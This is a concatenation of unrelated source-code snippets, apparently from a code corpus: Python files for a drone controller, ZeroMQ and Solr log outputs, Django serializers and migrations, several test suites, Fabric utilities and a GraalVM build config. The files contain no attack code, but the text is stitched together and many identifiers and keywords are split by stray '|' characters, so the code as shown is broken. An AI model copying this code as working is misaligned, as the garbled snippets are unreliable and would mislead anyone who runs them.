for key in ['AWS_ACCESS_KEY_ID', 'AWS_SECRET_ACCESS_KEY',
'AWS_BUCKET_NAME', 'NEXT_BACKEND_GLOBAL_HOST']:
if key not in os.environ:
print ' ' + key
sys.exit()
# Call launch_experiment module found in NEXT/lauch_experiment.py
exp_uid_list, exp_key_list, widget_key_list = launch_experiment(host, experiment_list, AWS_ACCESS_ID, AWS_SECRET_ACCESS_KEY, AWS | _BUCKET_NAME)
# Update the cartoon_dueling.html file wit the exp_uid_list and widget_key_list
# with open('cartoon_tuple_n25k8.html','r') as page:
# print "opended file"
# page_string = page.read()
# page_string = page_string.replace("{{exp_uid_list}}", str(exp_uid_list))
# page_string = page_string.replace("{{widget_key_list}}", str(widget_key_list))
# with open('../../next_frontend_base/next_frontend_base/templates/cartoon_tuple_n25k8.html','w') as out:
# out.write(page_st | ring)
# out.flush()
# out.close()
|
david2307/backend_159 | communities/serializers.py | Python | gpl-3.0 | 460 | 0.008696 | from rest_framework import serializers
from . | models import Community, Objective, SocialNetwork, Sector
class ObjectiveSerializer(serializers.ModelSerializer):
clas | s Meta:
model = Objective
class CommunitySerializer(serializers.ModelSerializer):
objectives = ObjectiveSerializer(many=True)
class Meta:
model = Community
depth = 1
class SectorSerializer(serializers.ModelSerializer):
class Meta:
model = Sector |
chhsiao1981/f6a_tw_crawler | tests/__init__.py | Python | mit | 147 | 0 | # -*- coding: utf-8 -*-
from f6a_tw_crawl | er.constants | import *
import unittest
import logging
def setup():
pass
def teardown():
pass
|
sassystacks/DASS | Simulation/Test_userInput_roll.py | Python | mit | 5,053 | 0.008114 | from dronekit import connect, VehicleMode, LocationGlobal, LocationGlobalRelative
from pymavlink import mavutil # Needed for command message definitions
from Find_serial_ports import serial_ports
import time
import math
import argparse
parser = argparse.ArgumentParser(description='Control Copter and send commands in GUIDED mode ')
parser.add_argument('--connect',
help="Vehicle connection target string. If not specified, SITL automatically started and used.")
args = parser.parse_args()
connection_string = args.connect
sitl = None
#Start SITL if no connection string specified
if not connection_string:
import dronekit_sitl
sitl = dronekit_sitl.start_default()
connection_string = sitl.connection_string()
# Connect to the Vehicle
print 'Connecting to vehicle on: %s' % connection_string
vehicle = connect(connection_string, wait_ready=True)
def arm_and_takeoff(aTargetAltitude):
"""
Arms vehicle and fly to aTargetAltitude.
"""
print "Basic pre-arm checks"
#Don't let the user try to arm until autopilot is ready
vehicle._ekf_poshorizabs = True
vehicle.mode = VehicleMode("GUIDED")
while not vehicle.is_armable:
print " Waiting for vehicle to initialise..."
print "gps: ", vehicle.gps_0.fix_type
print "EKF: ", vehicle._ekf_poshorizabs
print "VehicleMode: ", vehicle.mode
time.sleep(1)
print "Arming motors"
# Copter should arm in GUIDED mode
vehicle.mode = VehicleMode("GUIDED")
vehicle.armed = True
while not vehicle.armed:
print " Waiting for arming..."
time.sleep(1)
print(vehicle.mode )
print "Taking off!"
vehicle.mode = VehicleMode("GUIDED")
vehicle.simple_takeoff(aTargetAltitude) # Take off to target altitude
# Wait until the vehicle reaches a safe height before processing the goto (otherwise the command
# after Vehicle.simple_takeoff will execute immediately).
while True:
print " Altitude: ", vehicle.location.global_relative_frame.alt
print " vehicle mode: ", vehicle.mode
if vehicle.location.global_relative_frame.alt>=aTargetAltitude*0.95: #Trigger just below target alt.
print "Reached target altitude"
break
time.sleep(1)
def send_global_velocity(velocity_x, velocity_y, velocity_z, duration):
"""
Move vehicle in direction based on specified velocity vectors.
This uses the SET_POSITION_TARGET_GLOBAL_INT command with type mask enabling only
velocity components
(http://dev.ardupilot.com/wiki/copter-commands-in-guided-mode/#set_position_target_global_int).
Note that from AC3.3 the message should be re-sent every second (after about 3 seconds
with no message the velocity will drop back to zero). In AC3.2.1 and earlier the specified
velocity persists until it is canceled. The code below should work on either version
(sending the message multiple times does not cause problems) | .
See the above link for information on the type_mask (0=enable, 1=ignore).
At time of writing, acceleration a | nd yaw bits are ignored.
"""
msg = vehicle.message_factory.set_position_target_global_int_encode(
0, # time_boot_ms (not used)
0, 0, # target system, target component
mavutil.mavlink.MAV_FRAME_GLOBAL_RELATIVE_ALT_INT, # frame
0b0000111111000111, # type_mask (only speeds enabled)
0, # lat_int - X Position in WGS84 frame in 1e7 * meters
0, # lon_int - Y Position in WGS84 frame in 1e7 * meters
0, # alt - Altitude in meters in AMSL altitude(not WGS84 if absolute or relative)
# altitude above terrain if GLOBAL_TERRAIN_ALT_INT
velocity_x, # X velocity in NED frame in m/s
velocity_y, # Y velocity in NED frame in m/s
velocity_z, # Z velocity in NED frame in m/s
0, 0, 0, # afx, afy, afz acceleration (not supported yet, ignored in GCS_Mavlink)
0, 0) # yaw, yaw_rate (not supported yet, ignored in GCS_Mavlink)
# send command to vehicle on 1 Hz cycle
for x in range(0,duration):
vehicle.send_mavlink(msg)
time.sleep(1)
def update_pos():
print(vehicle.location.local_frame)
print "vehicle heading: ", vehicle.heading
print "clock time: ", time.time()
current_North= vehicle.location.local_frame.north
current_East = vehicle.location.local_frame.east
current_alt = vehicle.location.local_frame.east
#Arm and take of to altitude of 5 meters
arm_and_takeoff(4)
update_pos()
time.sleep(2)
duration_entered = 2
roll1 = 3
send_global_velocity(0,roll1,0,duration_entered)
print"roll1 velocity: ", roll1
update_pos()
send_global_velocity(0,0,0,duration_entered)
update_pos()
time.sleep(2)
print("Setting LAND mode...")
vehicle.mode = VehicleMode("LAND")
# Close vehicle object before exiting script
print "Close vehicle object"
vehicle.close()
|
jbruce12000/septic-tank | septic_tank/outputs.py | Python | mit | 9,478 | 0.007597 | from pipeline import Pipe
from pysolr import Solr
import json
import logging
import sys
import time
import zmq
import sqlite3 as lite
from collections import defaultdict
class Output(Pipe):
def data_invalid(self,data):
if 'type' not in data:
return True
if len(data.keys()) < 2:
return True
return False
class STDOutput(Output):
'''
output that prints data to stdout
'''
def execute(self,data):
logging.debug('%s execute with data %s' % (type(self),data))
print data
sys.stdout.flush()
return data
class JSONOutput(Output):
def __init__(self, **hints):
self.hints = hints
super(JSONOutput, self).__init__()
def execute(self,data):
logging.debug('%s execute with data %s' % (type(self),data))
print json.dumps(data,**self.hints)
sys.stdout.flush()
return data
class ZeroMQOutput(Output):
def __init__(self,host='127.0.0.1', port='8001', zmq_socket_type=zmq.REQ):
super(ZeroMQOutput, self).__init__()
self.host = host
self.port = port
self.addr = 'tcp://%s:%s' % (host,port)
self.context = zmq.Context()
self.socket = self.context.socket(zmq.REQ)
self.socket.connect(self.addr)
self.poller = zmq.Poller()
# zmq.POLLIN|zmq.POLLOUT
self.poller.register(self.socket, zmq.POLLIN)
def reconnect(self):
logging.warn('%s reconnecting to %s' % (type(self),self.addr))
self.socket.close()
self.context.term()
self.context = zmq.Context()
self.socket = self.context.socket(zmq.REQ)
self.socket.connect(self.addr)
self.poller = zmq.Poller()
self.poller.register(self.socket, zmq.POLLIN)
def execute(self,data):
logging.debug('%s execute with data %s' % (type(self),data))
msg = json.dumps(data,separators=(',',':'))
try:
self.socket.send(msg,zmq.NOBLOCK)
except Exception,err:
logging.error('zeromq socket send error: %s' % str(err))
self.reconnect()
return None
# if the server disconnects, reconnect in one second
socks = dict(self.poller.poll(1000))
if socks:
try:
ignore = self.socket.recv()
return data
except Exception,err:
logging.error('zeromq socket recv error: %s' % str(err))
# if I get here something bad happened. reconnect.
self.reconnect()
return None
class ZeroMQParentParallelOutput(Output):
'''
An output used to load balance records across multiple processes.
This is used by the parent process to get data to the children in
load balanced fashion.
'''
def __init__(self, host='*', port=6666):
super(ZeroMQParentParallelOutput, self).__init__()
self.host = host
self.port = port
self.addr = 'tcp://%s:%s' % (host,port)
self.context = zmq.Context()
self.socket = self.context.socket(zmq.PUSH)
self.socket.bind(self.addr)
def execute(self,data):
logging.debug('%s execute with data %s' % (type(self),data))
msg = json.dumps(data,separators=(',',':'))
try:
self.socket.send(msg)
except Exception,err:
logging.error('zeromq socket send error: %s' % str(err))
return None
return data
class ZeroMQChildParallelOutput(Output):
'''
An output used to return data from multiple parallel processes to
the parent.
'''
def __init__(self, host='127.0.0.1', port=6667):
super(ZeroMQChildParallelOutput, self).__init__()
self.host = host
self.port = port
self.addr = 'tcp://%s:%s' % (host,port)
self.context = zmq.Context()
self.socket = self.context.socket(zmq.PUSH)
self.socket.connect(self.addr)
def execute(self,data):
logging.debug('%s execute with data %s' % (type(self),data))
msg = json.dumps(data,separators=(',',':'))
try:
self.socket.send(msg)
except Exception,err:
logging.error('zeromq socket send error: %s' % str(err))
return None
return data
class SOLROutput(Output):
def __init__(self,solrurl,commitrate=10000,typemap={}):
super(SOLROutput, self).__init__()
self.solrurl = solrurl
self.conn = Solr(self.solrurl)
self.commitrate = commitrate
self.solrcache = []
self.commityet = 0
self.typemap = typemap
# post 0 docs to solr:
# 1. verify we can post to solr
# 2. load libs for __del__
self.commit_to_solr()
def execute(self,data):
logging.debug('%s execute with data %s' % (type(self),data))
if self.data_invalid(data):
logging.debug('data is invalid %s' % data)
return None
solrdata = {}
for key in data:
if key in self.typemap:
skey = "%s%s" % (key,self.typemap[key])
elif key == 'id':
skey = key
elif key == 'msg':
skey = key
else:
skey = "%s_t" % key
solrdata[skey] = data[key]
self.solrcache.append(solrdata)
self.commityet += 1
# commit every once and a while
if(self.commityet >= self.commitrate):
self.commit_to_solr()
# required at end of pipeline
return data
def commit_to_solr(self):
logging.debug('adding %d docs to solr' % self.commityet)
try:
self.conn.add(self.solrcache)
self.commityet = 0
self.solrcache = []
except Exception, err:
# if solr is down, this fails at a rate of about 1/s until
# solr comes back up. the backlog in the cache then gets
# written.
logging.error('solr cache size: %d' % len(self.solrcache))
logging.error('solr add error: %s' % str(err))
time.sleep(1);
return None
def __del__(self):
self.commitrate = 0
logging.debug('shutting down, clearing cache to solr')
self.commit_to_solr()
class SQLiteOutput(Output):
# FIX - needs to handle uniq id as docid???
def __init__(self,pa | th="ft.db",commitrate=10000):
super(SQLiteOutput, self).__init__()
self.path = path
self.commitrate = commitrate
self.sqlitecache = defaultdict(list)
self.commityet = 0
self.tables = {};
def create_table_sql_for(self,data):
| columns=",".join(data.keys())
#return "create virtual table %s using fts4(%s)" % (data['type'],columns)
return "create table if not exists %s (%s)" % (data['type'],columns)
def create_insert_sql_for(self,data):
columns = sorted(data.keys())
return "insert into %s (%s) values (%s)" % (data['type'],','.join(columns),','.join("?" for x in columns))
def create_insert_tuple_for(self,data):
values = []
for key in sorted(data.iterkeys()):
if data[key]:
values.append(unicode(data[key], errors='ignore'))
else:
values.append(unicode("", errors='ignore'))
return values
def execute(self,data):
logging.debug('%s execute with data %s' % (type(self),data))
if self.data_invalid(data):
logging.debug('data is invalid %s' % data)
return None
# create table sql
if data['type'] not in self.tables:
self.tables['type']=self.create_table_sql_for(data)
# this is a defaultdict like this...
# "insert into table (col1,col2) values (?,?)" => [(1,2),(3,4)]
sql = self.create_insert_sql_for(data)
self.sqlitecache[sql].append(self.create_insert_tuple_for(data))
self.commityet += 1
# commit every once and a while
if(self.commityet >= self.commitrate):
self.commit_to_sqlite()
# required at end of pipeline
|
justinbois/fish-activity | tests/test_summarize.py | Python | mit | 4,743 | 0.001265 | import pytest
import numpy as np
import pandas as pd
from pandas.util.testing import assert_frame_equal
import fishact
def test_sleep_latency():
df = pd.DataFrame({'zeit': np.linspace(0.0, 19.0, 20),
'sleep': np.ones(20, dtype=int)})
assert np.isnan(fishact.summarize._sleep_latency(df))
df.loc[6, 'sleep'] = 0
assert np.isclose(fishact.summarize._sleep_latency(df), 1.0)
df.loc[7, 'sleep'] = 0
assert np.isclose(fishact.summarize._sleep_latency(df), 2.0)
df.loc[5, 'sleep'] = 0
assert np.isclose(fishact.summarize._sleep_latency(df), 3.0)
df.loc[15, 'sleep'] = 0
assert np.isclose(fishact.summarize._sleep_latency(df), 3.0)
df.loc[0:15, 'sleep'] = 0
assert np.isclose(fishact.summarize._sleep_latency(df), 16.0)
df['sleep'] = np.zeros(len(df))
assert np.isnan(fishact.summarize._sleep_latency(df))
def test_compute_bouts():
df = pd.DataFrame({'zeit': np.linspace(0.0, 19.0, 20),
'sleep': np.ones(20, dtype=int),
'time': pd.to_datetime(['2017-03-30 14:00:00',
'2017-03-30 14:01:00',
'2017-03-30 14:02:00',
'2017-03-30 14:03:00',
'2017-03-30 14:04:00',
'2017-03-30 14:05:00',
'2017-03-30 14:06:00',
'2017-03-30 14:07:00',
'2017-03-30 14:08:00',
'2017-03-30 14:09:00',
'2017-03-30 14:10:00',
| '2017-03-30 14:11:00',
'2017-03-30 14:12:00',
'2017-03-30 14:13:00 | ',
'2017-03-30 14:14:00',
'2017-03-30 14:15:00',
'2017-03-30 14:16:00',
'2017-03-30 14:17:00',
'2017-03-30 14:18:00',
'2017-03-30 14:19:00']),
'light': [True]*20,
'day': [5]*20})
correct_df = pd.DataFrame(
columns=['day_start', 'day_end', 'light_start', 'light_end',
'bout_start_zeit', 'bout_end_zeit',
'bout_start_clock', 'bout_end_clock', 'bout_length'])
assert_frame_equal(fishact.summarize._compute_bouts(df), correct_df)
df['sleep'] = np.array([0]*5 + [1]*15,dtype=int)
assert_frame_equal(fishact.summarize._compute_bouts(df), correct_df)
df['sleep'] = np.array([1]*5 + [0]*15,dtype=int)
assert_frame_equal(fishact.summarize._compute_bouts(df), correct_df)
df['sleep'] = np.array([0]*3 + [1]*4 + [0]*13,dtype=int)
correct_df = correct_df.append(
{'day_start': 5,
'day_end': 5,
'light_start': True,
'light_end': True,
'bout_start_zeit': 3.0,
'bout_end_zeit': 7.0,
'bout_start_clock': pd.to_datetime('2017-03-30 14:03:00'),
'bout_end_clock': pd.to_datetime('2017-03-30 14:07:00'),
'bout_length': 4.0}, ignore_index=True)
assert_frame_equal(fishact.summarize._compute_bouts(df), correct_df,
check_dtype=False)
df['sleep'] = np.array([0]*3 + [1]*4 + [0] + [1]*12, dtype=int)
assert_frame_equal(fishact.summarize._compute_bouts(df), correct_df,
check_dtype=False)
df['sleep'] = np.array([0]*3 + [1]*4 + [0]*2 + [1]*10 + [0],dtype=int)
correct_df = pd.DataFrame(
{'day_start': [5, 5],
'day_end': [5, 5],
'light_start': [True, True],
'light_end': [True, True],
'bout_start_zeit': [3.0, 9.0],
'bout_end_zeit': [7.0, 19.0],
'bout_start_clock': pd.to_datetime(['2017-03-30 14:03:00',
'2017-03-30 14:09:00']),
'bout_end_clock': pd.to_datetime(['2017-03-30 14:07:00',
'2017-03-30 14:19:00']),
'bout_length': [4.0, 10.0]})
correct_df = correct_df.sort_index(axis=1)
assert_frame_equal(fishact.summarize._compute_bouts(df).sort_index(axis=1),
correct_df, check_dtype=False)
|
qedsoftware/commcare-hq | corehq/ex-submodules/casexml/apps/case/tests/test_out_of_order_processing.py | Python | bsd-3-clause | 1,076 | 0 | import os
from django.test.utils import override_settings
fr | om django.test import TestCase
from casexml.apps.case.tests.util import delete_all_cases
from corehq.apps.receiverwrapper.util import submit_form_locally
from corehq.form_processor.interfaces.dbaccessors import CaseAccessors
@override_settings(CASEXML_FORCE_DOMAIN_CHECK=False)
class OutOfO | rderCaseTest(TestCase):
def setUp(self):
super(OutOfOrderCaseTest, self).setUp()
delete_all_cases()
def testOutOfOrderSubmissions(self):
dir = os.path.join(os.path.dirname(__file__), "data", "ordering")
for fname in ('update_oo.xml', 'create_oo.xml'):
with open(os.path.join(dir, fname), "rb") as f:
xml_data = f.read()
submit_form_locally(xml_data, 'test-domain')
case = CaseAccessors().get_case('30bc51f6-3247-4966-b4ae-994f572e85fe')
self.assertEqual('from the update form', case.pupdate)
self.assertEqual('from the create form', case.pcreate)
self.assertEqual('overridden by the update form', case.pboth)
|
cblair/docset_from_html | get_plist_text.py | Python | mit | 959 | 0.006257 | #!/usr/bin/env python3
def get_plist_text(cf_bundler_identifier, cf_bundle_name=None,
docset_platform_family=None):
"""TODO"""
cf_bundle_name = cf_bundle_name or cf_bundler_identifier.upper()
docset_platform_family = docset_platform_family or cf_bundle_name.upper()
return """
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>CFBundleIdentifier</key>
<string>{cf_bundler_iden | tifier}</string>
<key>CFBundleName</key>
<string>{cf_bundle_name}</string>
<key>DocSetPlatformFamily</key>
<string>{docset_platform_family}</string>
<key>isDashDocset</key>
<true/>
</dict>
</plist>""".format(cf_bundler_identifier=cf_bundler_identifier,
cf_bundle_name=cf_bundle_name,
docset_platform_family=docs | et_platform_family) |
allisonrandal/openstack-spec-tracker | spectracker/pagerender.py | Python | apache-2.0 | 1,658 | 0 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from datetime import datetime
from jinja2 import Environment
from jinja2 import FileSystemLoader
import os.path
def render_keytopics(template_dir, output_dir, topics, cycle):
template_file = "keytopics.html"
template_env = Environment(loader=FileSystemLoader(template_dir))
keytopics_tmpl = template_env.get_template(template_file)
output_file = os.path.join(output_dir, template_file)
with open(output_file, 'w') as fh:
fh.write(keytopics_tmpl.render(series=cycle,
| date=str(datetime.utcnow()),
frequency=topics))
def render_spec_list(template_dir, output_dir, spec_list):
template_file = "specifications | .html"
template_env = Environment(loader=FileSystemLoader(template_dir))
keytopics_tmpl = template_env.get_template(template_file)
output_file = os.path.join(output_dir, template_file)
with open(output_file, 'w') as fh:
fh.write(keytopics_tmpl.render(date=str(datetime.utcnow()),
specset=spec_list))
|
harun-emektar/webfs | tests/Test_WebDirParser.py | Python | apache-2.0 | 1,416 | 0.011299 | from webfs import WebDirParser
testDoc = """
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<html>
<head>
<title>Index of /ubuntu</title>
</head>
<body>
<h1>Index of /ubuntu</h1>
<pre><img src="/icons/blank.gif" alt="Icon "> <a href="?C=N;O=D">Name</a> <a href=" | ?C=M;O=A">Last modified</a> <a href="?C=S;O=A">Size</a> <a href="?C=D;O=A">Description</a><hr><img src="/icons/back.gif" alt="[DIR]"> <a href="/ | ">Parent Directory</a> -
<img src="/icons/folder.gif" alt="[DIR]"> <a href="dists/">dists/</a> 18-Jun-2014 12:46 -
<img src="/icons/folder.gif" alt="[DIR]"> <a href="indices/">indices/</a> 28-Apr-2008 17:47 -
<img src="/icons/compressed.gif" alt="[ ]"> <a href="ls-lR.gz">ls-lR.gz</a> 28-Apr-2008 16:05 4.5M
<img src="/icons/folder.gif" alt="[DIR]"> <a href="pool/">pool/</a> 14-Jan-2008 22:05 -
<img src="/icons/folder.gif" alt="[DIR]"> <a href="project/">project/</a> 28-Jun-2013 11:52 -
<hr></pre>
<address>Apache/2.2.22 (Ubuntu) Server at old-releases.ubuntu.com Port 80</address>
</body></html>
"""
def Test_ParsingTest():
wp = WebDirParser()
wp.feed(testDoc)
assert len(wp.entries) == 5
assert wp.entries.keys().sort() == ['dist', 'indices', 'ls-lR.gz', 'pool', 'project'].sort(),\
wp.entries.keys() |
dc3-plaso/plaso | tests/parsers/winreg_plugins/officemru.py | Python | apache-2.0 | 3,793 | 0.001318 | #!/usr/bin/python
# -*- coding: utf-8 -*-
"""Tests for the Microsoft Office MRUs Windows Registry plugin."""
import unittest
from plaso.formatters import officemru # pylint: disable=unused-import
from plaso.formatters import winreg # pylint: disable=unused-import
from plaso.lib import eventdata
from plaso.lib import timelib
from plaso.parsers.winreg_plugins import officemru
from tests import test_lib as shared_test_lib
from tests.parsers.winreg_plugins import test_lib
__author__ = 'David Nides (david.nides@gmail.com)'
class OfficeMRUPluginTest(test_lib.RegistryPluginTestCase):
"""Tests for the Microsoft Office MRUs Windows Registry plugin."""
@shared_test_lib.skipUnlessHasTestFile([u'NTUSER-WIN7.DAT'])
def testProcess(self):
"""Tests the Process function."""
test_file_entry = self._GetTestFileEntry([u'NTUSER-WIN7.DAT'])
key_path = (
u'HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\14.0\\Word\\'
u'File MRU')
win_registry = self._GetWinRegistryFromFileEntry(test_file_entry)
registry_key = win_registry.GetKeyByPath(key_path)
plugin_object = officemru.OfficeMRUPlugin()
storage_writer = self._ParseKeyWithPlugin(
registry_key, plugin_object, file_entry=test_file_entry)
self.assertEqual(len(storage_writer.events), 6)
event_object = storage_writer.events[5]
self.assertEqual(event_object.pathspec, test_file_entry.path_spec)
# This should just be the plugin name, as we're invoking it directly,
# and not through the parser.
self.assertEqual(event_object.parser, plugin_object.plugin_name)
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2012-03-13 18:27:15.089802')
self.assertEqual(event_object.timestamp, expected_timestamp)
self.assertEqual(
event_object.timestamp_desc, eventdata.EventTimestamp.WRITTEN_TIME)
regvalue_identifier = u'Item 1'
expected_value_string = (
u'[F00000000][T01CD0146EA1EADB0][O00000000]*'
u'C:\\Users\\nfury\\Documents\\StarFury\\StarFury\\'
u'SA-23E Mitchell-Hyundyne Starfury.docx')
self._TestRegvalue(event_object, regvalue_identifier, expected_value_string)
expected_message = (
u'[{0:s}] '
u'{1:s}: {2:s} '
u'Item 2: [F00000000][T01CD00921FC127F0][O00000000]*'
u'C:\\Users\\nfury\\Documents\\StarFury\\StarFury\\Earthforce SA-26 '
u'Thunderbolt Star Fury.docx '
u'Item 3: [F00000000][T01CD009208780140][O00000000]*'
u'C:\\Users\\nfury\\Documents\\StarFury\\StarFury\\StarFury.docx '
u'Item 4: [F00000000][T01CCFE0B22DA9EF0][O00000000]*'
u'C:\\Users\\nfury\\Documents\\VIBRANIUM.docx '
u'Item 5: [F00000000][T01CCFCBA595DFC30][O00000000]*'
u'C:\\Users\\nfury\\Documents\\ADAMANTIUM-Background.docx').format(
key_path, regvalue_identifier, expected_value_string)
expected_short_message = u'{0:s}...'.format(expected_message[0:77])
self._TestGetMessageStrings(
event_object, expected_message, expected_short_message)
# Test OfficeMRUWindowsRegistryEvent.
event_object = storage_writer.events[0]
expected_timestamp = timelib.Timestamp.CopyFromString(
u'2012-03-13 18:27:15.083')
self.assertEqual(event_object.timestamp, expected_timestamp)
self.assertEqual(
event_object.timestamp_desc, eventdata.EventTimestamp.WRITTEN_ | TIME)
self.assertEqual(event_object.value_string, expected_value_string)
expected_message = u'[{0:s}] Value: {1:s}'.format(
key_path, expected_value_string)
expected_short_message = u'{0:s}...'.format(expected_value_string[0:77])
self._TestGetM | essageStrings(
event_object, expected_message, expected_short_message)
if __name__ == '__main__':
unittest.main()
|
apavlo/h-store | third_party/python/fabric/utils.py | Python | gpl-3.0 | 4,636 | 0.000431 | """
Internal subroutines for e.g. aborting execution with an error message,
or performing indenting on multiline output.
"""
import sys
import textwrap
def abort(msg):
"""
Abort execution, print ``msg`` to stderr and exit with error status (1.)
This function currently makes use of `sys.exit`_, which raises
`SystemExit`_. Therefore, it's possible to detect and recover from inner
calls to `abort` by using ``except SystemExit`` or similar.
.. _sys.exit: http://docs.python.org/library/sys.html#sys.exit
.. _SystemExit: http://docs.python.org/library/exceptions.html#exceptions.SystemExit
"""
from fabric.state import output
if output.aborts:
print >> sys.stderr, "\nFatal error: " + str(msg)
print >> sys.stderr, "\nAborting."
sys.exit(1)
def warn(msg):
"""
Print warning message, but do not abort execution.
This function honors Fabric's :doc:`output controls
<../../usage/output_controls>` and will print the given ``msg`` to stderr,
provided that the ``warnings`` output level (which is active by default) is
turned on.
"""
from fabric.state import output
if output.warnings:
print >> sys.stderr, "\nWarning: %s\n" % msg
def indent(text, spaces=4, strip=False):
"""
Return ``text`` indented by the given number of spaces.
If text is not a string, it is assumed to be a list of lines and will be
joined by ``\\n`` prior to indenting.
When ``strip`` is ``True``, a minimum amount of whitespace is removed from
the left-hand side of the given string (so that relative indents are
preserved, but otherwise things are left-stripped). This allows you to
effectively "normalize" any previous indentation for some inputs.
"""
# Normalize list of strings into a string for dedenting. "list" here means
# "not a string" meaning "doesn't have splitlines". Meh.
if not hasattr(text, 'splitlines'):
text = '\n'.join(text)
# Dedent if requested
if strip:
text = textwrap.dedent(text)
prefix = ' ' * spaces
output = '\n'.join(prefix + line for line in text.splitlines())
# Strip out empty lines before/aft
output = output.strip()
# Reintroduce first indent (which just got stripped out)
output = prefix + output
return output
def puts(text, show_prefix=True, end="\n", flush=False):
"""
An alias for ``print`` whose output is managed by Fabric's output controls.
In other words, this function simply prints to ``sys.stdout``, but will
hide its output if the ``user`` :doc:`output level
</usage/output_controls>` is set to ``False``.
If ``show_prefix=False``, `puts` will omit the leading ``[hostname]``
which it tacks on by default. (It will also omit this prefix if
``env.host_string`` is empty.)
Newlines may be disabled by setting ``end`` to the empty string (``''``).
(This intentionally mirrors Python 3's ``print`` syntax.)
You may force output flushing (e.g. to bypass output buffering) by setting
``flush=True``.
.. versionadded:: 0.9.2
.. seealso:: `~fabric.utils.fastprint`
"""
from fabric.state import output, env
if output.user:
prefix = ""
if env.host_string and show_prefix:
prefix = "[%s] " % env.host_string
sys.stdout.write(prefix + str(text) + end)
if flush:
sys.stdout.flush()
def fastprint(text, show_prefix=False, end="", flush=True):
"""
Print ``text`` immediately, without any prefix or line ending.
This function is simply an alias of `~fabric.utils.puts` with different
default argument values, such that the ``text`` is printed without any
embellishment and immediately flushed.
It is useful for any situation where you wish to print text which might
otherwise get buffered by Python's output buffering (such as within a
processor intensive `` | for`` loop). Sin | ce such use cases typically also
require a lack of line endings (such as printing a series of dots to
signify progress) it also omits the traditional newline by default.
.. note::
Since `~fabric.utils.fastprint` calls `~fabric.utils.puts`, it is
likewise subject to the ``user`` :doc:`output level
</usage/output_controls>`.
.. versionadded:: 0.9.2
.. seealso:: `~fabric.utils.puts`
"""
return puts(text=text, show_prefix=show_prefix, end=end, flush=flush)
def handle_prompt_abort():
import fabric.state
if fabric.state.env.abort_on_prompts:
abort("Needed to prompt, but abort-on-prompts was set to True!")
|
mayapurmedia/tovp | tovp/contributions/migrations/0023_auto_20150414_1305.py | Python | mit | 792 | 0.002525 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models | , migrations
class Migration(migrations.Migration):
dependencies = [
('contributions', '0022_auto_20150413_1726'),
]
o | perations = [
migrations.AddField(
model_name='bulkpayment',
name='overwrite_pan_card',
field=models.CharField(null=True, verbose_name='Overwrite PAN card number', max_length=50, blank=True),
preserve_default=True,
),
migrations.AddField(
model_name='contribution',
name='overwrite_pan_card',
field=models.CharField(null=True, verbose_name='Overwrite PAN card number', max_length=50, blank=True),
preserve_default=True,
),
]
|
smarr/Truffle | vm/mx.vm/mx_vm.py | Python | gpl-2.0 | 19,478 | 0.002362 | #
# ----------------------------------------------------------------------------------------------------
#
# Copyright (c) 2018, 2021, Oracle and/or its affiliates. All rights reserved.
# DO NOT ALTER OR REMOVE COPYRIGHT NOTICES OR THIS FILE HEADER.
#
# This code is free software; you can redistribute it and/or modify it
# under the terms of the GNU General Public License version 2 only, as
# published by the Free Software Foundation. Oracle designates this
# particular file as subject to the "Classpath" exception as provided
# by Oracle in the LICENSE file that accompanied this code.
#
# This code is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License
# version 2 for more details (a copy is included in the LICENSE file that
# accompanied this code).
#
# You should have received a copy of the GNU General Public License version
# 2 along with this work; if not, write to the Free Software Foundation,
# Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#
# Please contact Oracle, 500 Oracle Parkway, Redwood Shores, CA 94065 USA
# or visit www.oracle.com if you need additional information or have any
# questions.
#
# ----------------------------------------------------------------------------------------------------
from __future__ import print_function
import mx
import mx_gate
import mx_jardistribution
import mx_sdk_vm, mx_sdk_vm_impl
import mx_vm_benchmark
import mx_vm_gate
import os
from os.path import basename, isdir, join, relpath
_suite = mx.suite('vm')
""":type: mx.SourceSuite | mx.Suite"""
mx_sdk_vm.register_graalvm_component(mx_sdk_vm.GraalVmJdkComponent(
suite=_suite,
name='Component installer',
short_name='gu',
dir_name='installer',
| license_files=[],
third_party_license_files=[],
dependencies=['sdk'],
jar_distributions=[
'vm:INSTALLER',
'truffle:TruffleJSON'
],
support_distributions=['vm:IN | STALLER_GRAALVM_SUPPORT'],
launcher_configs=[
mx_sdk_vm.LauncherConfig(
destination="bin/<exe:gu>",
jar_distributions=[
'vm:INSTALLER',
'truffle:TruffleJSON'
],
dir_jars=True,
main_class="org.graalvm.component.installer.ComponentInstaller",
build_args=[],
# Please see META-INF/native-image in the project for custom build options for native-image
is_sdk_launcher=True,
custom_launcher_script="mx.vm/gu.cmd" if mx.is_windows() else None,
),
],
stability="supported",
))
mx_sdk_vm.register_graalvm_component(mx_sdk_vm.GraalVmComponent(
suite=_suite,
name='GraalVM license files',
short_name='gvm',
dir_name='.',
license_files=['LICENSE.txt'],
third_party_license_files=['THIRD_PARTY_LICENSE.txt'],
dependencies=[],
support_distributions=['vm:VM_GRAALVM_SUPPORT'],
stability="supported",
))
mx_sdk_vm.register_graalvm_component(mx_sdk_vm.GraalVmJreComponent(
suite=_suite,
name='Polybench Launcher',
short_name='pbm',
license_files=[],
third_party_license_files=[],
dir_name='polybench',
launcher_configs=[mx_sdk_vm.LauncherConfig(
destination='bin/<exe:polybench>',
jar_distributions=['vm:POLYBENCH'],
main_class='org.graalvm.polybench.PolyBenchLauncher',
build_args=[
'-H:-ParseRuntimeOptions',
'-H:Features=org.graalvm.launcher.PolyglotLauncherFeature',
'--tool:all',
],
is_main_launcher=True,
default_symlinks=True,
